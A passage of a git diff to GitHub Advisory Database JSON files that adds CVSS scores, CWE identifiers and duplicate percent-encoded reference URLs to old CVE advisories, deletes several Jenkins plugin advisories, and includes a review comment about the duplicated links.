"url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": 
"https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3Ccvs.httpd.apache.org%3E" + 
}, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b@%3Ccvs.httpd.apache.org%3E" diff --git a/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json b/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json index 58c4e567b8374..70c605c9efbde 100644 --- a/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json +++ b/advisories/unreviewed/2022/05/GHSA-wx39-gwc4-8cjf/GHSA-wx39-gwc4-8cjf.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wx39-gwc4-8cjf", - "modified": "2022-05-01T02:03:09Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-05-01T02:03:09Z", "aliases": [ "CVE-2005-1891" ], "details": "The GIF parser in ateimg32.dll in AOL Instant Messenger (AIM) 5.9.3797 and earlier allows remote attackers to cause a denial of service (crash) via a malformed buddy icon that causes an integer underflow in a loop counter variable.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json b/advisories/unreviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json deleted file mode 100644 index ccc0c4f6b6a20..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wxj2-qc9p-65r3", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003026" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins Mattermost Notification Plugin 2.6.2 and earlier in MattermostNotifier.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified Mattermost server and room and send a message.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003026" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-985" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107295" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-20T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json b/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json index 3795bcbacb929..461078cb9d691 100644 --- a/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json +++ b/advisories/unreviewed/2022/05/GHSA-x35p-q7vp-559r/GHSA-x35p-q7vp-559r.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x35p-q7vp-559r", - "modified": "2022-05-02T06:09:53Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-02T06:09:53Z", "aliases": [ "CVE-2010-0050" ], "details": "Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -97,7 +100,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json b/advisories/unreviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json deleted file mode 100644 index 1a1726ef68f56..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-x654-4wjh-74q6", - "modified": "2022-05-13T01:36:51Z", - "published": "2022-05-13T01:36:51Z", - "aliases": [ - "CVE-2017-2648" - ], - "details": "It was found that jenkins-ssh-slaves-plugin before version 1.15 did not perform host key verification, thereby enabling Man-in-the-Middle attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2648" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2648" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-03-20/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/96985" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-07-27T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json b/advisories/unreviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json deleted file mode 100644 index 18d696400248a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-x7qf-qh3r-mx22", - "modified": "2022-05-14T03:46:09Z", - "published": "2022-05-14T03:46:09Z", - "aliases": [ - "CVE-2018-1000010" - ], - "details": "Jenkins DRY Plugin 2.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000010" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json b/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json index 516714c4370c3..582a33ff9ad9c 100644 --- a/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json +++ b/advisories/unreviewed/2022/05/GHSA-x89c-76jf-xx4h/GHSA-x89c-76jf-xx4h.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x89c-76jf-xx4h", - "modified": "2022-05-24T19:21:18Z", + "modified": "2024-02-04T09:30:31Z", "published": "2022-05-24T19:21:18Z", "aliases": [ "CVE-2021-28706" ], "details": "guests may exceed their designated memory limit When a guest is permitted to have close to 16TiB of memory, it may be able to issue hypercalls to increase its memory allocation beyond the administrator established limit. This is a result of a calculation done with 32-bit precision, which may overflow. It would then only be the overflowed (and hence small) number which gets compared against the established upper bound.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H" + } ], "affected": [ @@ -18,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28706" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -26,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json b/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json index bd2b64a4ebb62..66a01859d486f 100644 --- a/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json 
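Review bot: The second hunk of GHSA-x89c-76jf-xx4h adds two Fedora package-announce URLs whose only difference from the unchanged entries a few lines below is `%40` in place of `@` in the list address, so each announcement is now referenced twice. The same percent-encoded duplicates are added in GHSA-55c8-6r36-9g85, GHSA-f3p5-98fc-2gxr, GHSA-w7j2-r4x6-6frw, GHSA-wfvr-4p83-r8mf, GHSA-fqrh-w8r3-22q6, GHSA-r55p-5rm2-vqg9 and GHSA-wp5g-757j-v342. Presumably these arrive verbatim from the upstream reference list; deduplicating on a percent-decoded URL at import time would keep one entry per message and stop consumers that match references by exact string from counting them as distinct sources.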
+++ b/advisories/unreviewed/2022/05/GHSA-x9c5-c5mj-wjjx/GHSA-x9c5-c5mj-wjjx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x9c5-c5mj-wjjx", - "modified": "2022-05-01T23:58:24Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-01T23:58:24Z", "aliases": [ "CVE-2008-3281" ], "details": "libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -189,7 +192,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-776" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json b/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json index 4e6db0531b917..7e73ff0bbe6e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json +++ b/advisories/unreviewed/2022/05/GHSA-xc62-vv2q-247g/GHSA-xc62-vv2q-247g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xc62-vv2q-247g", - "modified": "2022-05-01T23:58:54Z", + "modified": "2024-02-08T15:30:26Z", "published": "2022-05-01T23:58:54Z", "aliases": [ "CVE-2008-3324" ], "details": "The PartyGaming PartyPoker client program 121/120 does not properly verify the authenticity of updates, which allows remote man-in-the-middle attackers to execute arbitrary code via a Trojan horse update.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,6 +40,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-494", "CWE-94" ], "severity": "HIGH", 
diff --git a/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json b/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json index 0b52a6ad247a4..8c9e66ee28a49 100644 --- a/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json +++ b/advisories/unreviewed/2022/05/GHSA-xf9v-wfx4-53c3/GHSA-xf9v-wfx4-53c3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xf9v-wfx4-53c3", - "modified": "2022-05-01T18:06:32Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-01T18:06:32Z", "aliases": [ "CVE-2007-2723" ], "details": "Media Player Classic 6.4.9.0 allows user-assisted remote attackers to cause a denial of service (web browser crash) via an \"empty\" .MPA file, which triggers a divide-by-zero error.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-369" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json b/advisories/unreviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json deleted file mode 100644 index 6366dbaf97812..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json +++ /dev/null 
@@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xgc2-q928-27wv", - "modified": "2022-05-17T01:55:53Z", - "published": "2022-05-17T01:55:53Z", - "aliases": [ - "CVE-2010-5104" - ], - "details": "The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 does not properly escape input when the MySQL database is set to sql_mode NO_BACKSLASH_ESCAPES, which allows remote attackers to obtain sensitive information via wildcard characters in a LIKE query.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5104" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64185" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/35770" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/70116" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/45470" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-05-21T20:55:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json b/advisories/unreviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json deleted file mode 100644 index d96456a765a35..0000000000000 
--- a/advisories/unreviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xgmh-rvpw-6498", - "modified": "2022-05-14T03:33:40Z", - "published": "2022-05-14T03:33:40Z", - "aliases": [ - "CVE-2018-1000108" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins CppNCSS Plugin 1.1 and earlier in AbstractProjectAction/index.jelly that allow an attacker to craft links to Jenkins URLs that run arbitrary JavaScript in the user's browser when accessed.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000108" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-712" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-03-13T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json b/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json index cf2da312a48ad..7eee8055d22de 100644 --- a/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json +++ b/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xhjj-jg7j-pqrx", - "modified": "2022-05-01T18:29:00Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-01T18:29:00Z", "aliases": [ "CVE-2007-4988" ], "details": "Sign extension error in the ReadDIBImage function in ImageMagick before 6.3.5-9 allows context-dependent attackers to execute arbitrary code via a crafted width value in an image file, which triggers an integer overflow and a heap-based buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -121,7 +124,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-681" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json b/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json index b26252b616123..e1bccbbc3c697 100644 --- a/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json +++ b/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xhq8-8cqj-q337", - "modified": "2022-05-14T02:15:15Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-14T02:15:15Z", "aliases": [ "CVE-2011-0611" ], "details": "Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a \"group of included constants,\" object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -121,7 +124,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-843" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json b/advisories/unreviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json deleted file mode 100644 index 60d8367b54b1a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xj4w-r6gr-x5qm", - "modified": "2023-02-23T03:30:16Z", - "published": "2022-05-24T22:00:44Z", - "aliases": [ - "CVE-2019-10407" - ], - "details": "Jenkins Project Inheritance Plugin 2.0.0 and earlier displayed a list of environment variables passed to a build without masking sensitive variables contributed by the Mask Passwords Plugin.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10407" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-351" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json b/advisories/unreviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json deleted file mode 100644 index 8c3308ff61d9d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xj63-95xc-jc4v", - "modified": "2023-10-25T18:31:24Z", - "published": "2022-05-24T16:52:46Z", - "aliases": [ - "CVE-2019-10385" - ], - "details": "Jenkins eggPlant Plugin 2.2 and earlier stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10385" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1430" - }, - { - "type": "WEB", - "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-834/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json b/advisories/unreviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json deleted file mode 100644 index d6944c9800da5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json +++ /dev/null 
